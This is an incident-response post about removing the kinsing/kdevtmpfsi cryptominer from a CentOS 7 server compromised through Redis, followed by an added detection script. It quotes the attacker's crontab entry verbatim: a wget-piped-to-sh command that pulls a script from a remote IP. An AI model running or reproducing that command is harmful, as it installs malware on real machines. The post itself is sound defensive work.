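System: CentOS 7
Today I suddenly received an alert from the server. After logging in and checking with top, I found an unfamiliar process consuming a large amount of CPU: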
[root@VM_5_22_centos cron]# top
top - 11:10:29 up 139 days, 2:54, 1 user, load average: 2.23, 2.19, 2.23
Tasks: 198 total, 1 running, 197 sleeping, 0 stopped, 0 zombie
%Cpu(s):100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 3880224 total, 138612 free, 2735260 used, 1006352 buff/cache
KiB Swap: 1048572 total, 899580 free, 148992 used. 903404 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
10237 redis 20 0 2721444 2.3g 980 S 193.8 61.8 11:35.54 kdevtmpfsi
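My first move was to kill it directly, but the process started again automatically after being killed. If it can restart on its own, there must be a startup script behind it. First, deal with the process: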
[root@VM_5_22_centos cron]# systemctl status 10237
● session-351642.scope - Session 351642 of user redis
Loaded: loaded (/run/systemd/system/session-351642.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-351642.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since Fri 2020-11-13 09:24:02 CST; 2 weeks 4 days ago
CGroup: /user.slice/user-1002.slice/session-351642.scope
├─ 5906 /var/tmp/kinsing
└─10237 /tmp/kdevtmpfsi
Use systemctl to find the information related to this process, kill 5906 and 10237 directly, and delete the files at the same time:
kill -9 5906
kill -9 10237
rm -rf /var/tmp/kinsing
rm -rf /tmp/kdevtmpfsi
The process was started through redis, so the cron used by redis needs to be checked. Look directly at the files under the /var/spool/cron directory:
[root@VM_5_22_centos cron]# cat redis
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
Empty the redis file, and the incident handling is complete.
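The two checks done by hand above (a per-user crontab that downloads a script and pipes it to a shell, and processes running from /tmp or /var/tmp) can be repeated across all users with a small script. This is an added example, not part of the original post; the function names scan_cron_dir and list_tmp_procs are hypothetical and the regular expression is a heuristic, not a complete detector.

```shell
#!/usr/bin/env bash
# Added example (not from the original post). Function names are hypothetical.

# scan_cron_dir [DIR]
# Print "file:line:entry" for every non-comment crontab line that downloads
# with wget/curl and pipes the result into a shell, the pattern found in
# /var/spool/cron/redis above. Returns 0 if at least one entry is flagged.
scan_cron_dir() {
    local dir="${1:-/var/spool/cron}" hits=0 f
    # [^#]* keeps commented-out lines from matching; heuristic only.
    local pattern='^[^#]*(wget|curl)[^|]*[|][[:space:]]*(ba|da)?sh([[:space:]]|$)'
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if grep -HnE "$pattern" "$f"; then
            hits=1
        fi
    done
    [ "$hits" -eq 1 ]
}

# list_tmp_procs
# Print "PID path" for every process whose executable lives in /tmp or
# /var/tmp, as kinsing and kdevtmpfsi did. A binary removed while the
# process is still running shows up with a " (deleted)" suffix.
list_tmp_procs() {
    local p exe
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/*|/var/tmp/*) echo "${p#/proc/} $exe" ;;
        esac
    done
}

# Usage (run as root so every user's crontab and /proc/PID/exe is readable):
#   scan_cron_dir /var/spool/cron && echo "suspicious cron entries found"
#   list_tmp_procs
```
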